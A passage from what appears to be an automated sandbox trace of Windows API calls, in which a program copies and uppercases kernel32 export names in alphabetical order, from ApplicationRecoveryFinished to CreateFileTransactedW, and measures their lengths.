lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.830] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.830] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.830] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.830] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.830] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.830] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.830] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.830] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.830] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.830] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.830] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.831] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.831] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.831] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.831] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.831] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.831] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.831] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.831] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.831] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.831] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.831] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.831] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.831] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.831] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.831] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.831] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.831] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.831] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.831] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.832] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.832] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.832] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.832] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.832] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.832] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.832] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.832] lstrlenA (lpString="BEEP") returned 4 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.832] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.832] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.832] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.832] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.832] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.832] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.832] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.832] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.832] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.832] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.833] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.833] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.833] lstrlenA (lpString="CANCELIO") returned 8 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.833] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.833] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.833] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.833] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.833] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.833] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.833] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.833] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.833] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.833] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.833] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.833] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.833] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.833] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.833] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.833] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.834] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.834] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.834] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.834] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.834] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.834] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.834] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.834] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.834] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.834] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.834] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.834] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.834] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.834] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.834] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.834] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.834] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.834] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.834] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.835] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.835] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.835] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.835] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.835] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.835] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.835] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.835] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.835] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.835] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.835] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.835] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.835] lstrlenA (lpString="COPYFILEA") returned 9 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.835] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.835] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.835] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.835] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.836] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.836] lstrlenA (lpString="COPYFILEW") returned 9 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.836] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.836] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.836] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.836] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.836] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.836] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.836] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.836] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.836] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.836] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.836] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.836] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.836] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.837] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.837] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.837] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.837] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.837] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.837] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.837] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.837] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.837] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.837] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.837] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.837] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.837] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.837] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.837] lstrcpyA 